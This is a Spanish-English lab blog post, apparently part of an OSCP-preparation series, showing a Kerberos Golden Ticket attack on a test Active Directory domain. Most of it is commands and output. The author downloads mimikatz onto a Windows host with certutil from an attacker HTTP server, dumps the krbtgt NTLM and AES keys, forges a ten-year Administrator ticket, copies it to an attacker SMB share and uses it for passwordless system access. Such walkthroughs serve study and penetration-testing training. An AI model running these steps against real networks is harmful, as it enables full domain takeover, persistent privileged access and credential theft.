Total Pageviews

Friday, October 8, 2021

Active Directory CORPORATIVE.domain.local Series[IX] : GoldenTicket

 Hi eveyone!


So far so good !, On this post entry i'm going to introduce yourself to exploit Active Directory directly to Domain Controller obtainng a golde tocket, This  kind of attck exploit directly to KDC (Kerberos Domain Controller), to obtain a ticket that provide to us a full persistence with administative privileges during ten years.




It's completely needed be performed this attack with administrator privileges on the Windows Active Directory.

1. EXPLOITATION:

    1.1 SHARE MIMIKATZ 

        kali@kali:~/Descargas/x64$ python3 -m http.server 8989

Serving HTTP on 0.0.0.0 port 8989 (http://0.0.0.0:8989/) ...

10.0.2.17 - - [19/Sep/2021 23:53:05] "GET /mimikatz.exe HTTP/1.1" 200 -

10.0.2.17 - - [19/Sep/2021 23:53:05] "GET /mimikatz.exe HTTP/1.1" 200 -



    1.2 OBTAIN MIMITAKZ BINARY
        
            

        C:\Users\worker2\golden_ticket>certutil.exe -urlcache -f http://10.0.2.19:8989/mimikatz.exe mimikatz.exexe
****  En línea  ****
CertUtil: -URLCache comando completado correctamente.

C:\Users\worker2\golden_ticket>dir
 El volumen de la unidad C no tiene etiqueta.
 El número de serie del volumen es: BE72-396A

 Directorio de C:\Users\worker2\golden_ticket

20/09/2021  17:05    <DIR>          .
20/09/2021  17:05    <DIR>          ..
20/09/2021  17:05         1.355.680 mimikatz.exexe
               1 archivos      1.355.680 bytes
               2 dirs   3.095.617.536 bytes libres




C:\Users\worker2\golden_ticket>

PS C:\Users\Administrador> .\mimikatz.exe


  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53

 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)

 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz

 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )

  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CORPORATIVE / S-1-5-21-2048228633-4105951457-1013245227

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 74b9c26e436d8ceacd2db129dbed8091
    LM   :
  Hash NTLM: 74b9c26e436d8ceacd2db129dbed8091
    ntlm- 0: 74b9c26e436d8ceacd2db129dbed8091
    lm  - 0: 0b85525f2bc07e8ddad5bc5116cda6be

 * WDigest
    01  529e053364e99c40018a763d093cd2d0
    02  0f153570e5bfc1beaf7af4548fe55407
    03  a2e7ca6217279efd9902dfec4f9c1ffc
    04  529e053364e99c40018a763d093cd2d0
    05  0f153570e5bfc1beaf7af4548fe55407
    06  a65e056b499477f816ceba51675d9710
    07  529e053364e99c40018a763d093cd2d0
    08  1afdffdfbb1a96b9eac70bf7c56c9918
    09  324a2bb9f95d144266eb7bccbe84e5ba
    10  560e55940f267584289f89a10c3a6a56
    11  c05c279a357cd56256c778bf63d45005
    12  324a2bb9f95d144266eb7bccbe84e5ba
    13  4d711b818095960a87259fa4fe347d3a
    14  c05c279a357cd56256c778bf63d45005
    15  080bb5dadc9fda118ed49eb23b1dec81
    16  c3c6dfa2a8c55fe7bd5460d3950d9cce
    17  dd4ec696ec2268f292b30966168ba6d2
    18  20bf77d7ae1c83731480dd3d58b83ead
    19  aa99179fb3b127c835e5c88014d5094f
    20  a94702c74ded36fba7260a834ae0a6ee
    21  c4c9af7a348d2321b2a366d16e26fc31
    22  c4c9af7a348d2321b2a366d16e26fc31
    23  0bac9a385f379934e709b3b9f2e1a6ee
    24  2b72cae08c1e9fb1c73e32b2418f237c
    25  127f40e154898bb85c338eed76bf7b28
    26  524d56073be5780737d7ffc2ed602391
    27  035dd1bc3fec5eacd425087efaefa33a
    28  d62ace76ae0c72b115a5f75d421c10cd
    29  9b274c0df827c3cf78d946c7d2f2a5a2

 * Kerberos
    Default Salt : CORPORATIVE.DOMAIN.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 46a25ef4f8cbec0d

 * Kerberos-Newer-Keys
    Default Salt : CORPORATIVE.DOMAIN.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 178c2ad109c08f5f1396f956f899e65c8e3ca03e77ea180584e5b0c5ed5cd25e
      aes128_hmac       (4096) : 84edbefb34b31b613865a44d4bf66e05
      des_cbc_md5       (4096) : 46a25ef4f8cbec0d

 * NTLM-Strong-NTOWF
    Random Value : f155a5de1b36973934e6291d7cc9c252


Generate golden ticket (KIRBI):

mimikatz # kerberos::golden /user:Administrador /domain:CORPORATIVE.DOMAIN.local /sid:S-1-5-21-2048228633-4105951457-101
3245227 /krbtgt:74b9c26e436d8ceacd2db129dbed8091 /ticket:ticket
User      : Administrador
Domain    : CORPORATIVE.DOMAIN.local (CORPORATIVE)
SID       : S-1-5-21-2048228633-4105951457-1013245227
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 74b9c26e436d8ceacd2db129dbed8091 - rc4_hmac_nt
Lifetime  : 20/09/2021 16:52:13 ; 18/09/2031 16:52:13 ; 18/09/2031 16:52:13
-> Ticket : ticket

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

List the ticket file:

mimikatz # kerberos::list

[00000000] - 0x00000012 - aes256_hmac

   Start/End/MaxRenew: 20/09/2021 16:42:45 ; 21/09/2021 2:42:45 ; 27/09/2021 16:42:45

   Server Name       : krbtgt/CORPORATIVE.DOMAIN.LOCAL @ CORPORATIVE.DOMAIN.LOCAL

   Client Name       : Administrador @ CORPORATIVE.DOMAIN.LOCAL

   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;


Share smbfolder from kali attaker machine:



 And copy ticket content:

C:\Users\Administrador>copy ticket \\10.0.2.19\smbfolder\

        1 archivo(s) copiado(s).


1.3 GOLDEN TICKET (CCACHE ):

Execute ticketer.py tool for obtain a ccache file:

 


List Ccache file:
root@kali:/home/kali/Master/lab4/test/data# ls -ltrh f0ns1*
-rw-r--r-- 1 root root 1,1K sep 27 20:54 f0ns1.ccache

 

Export environment variable:
export KRB5CCNAME=’f0ns1.ccache’

 

Access with f0ns1 user as nt Authority\system without credentials:


And this is all, for last Active directory attack, I hope that you enjoy with my nineth windows entry and you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Mi primera experiencia en una conferencia:

En la jornada posterior a un evento importante toca analizar, en este caso me centro en mi participación como speaker en #librecon2022. ¿Cóm...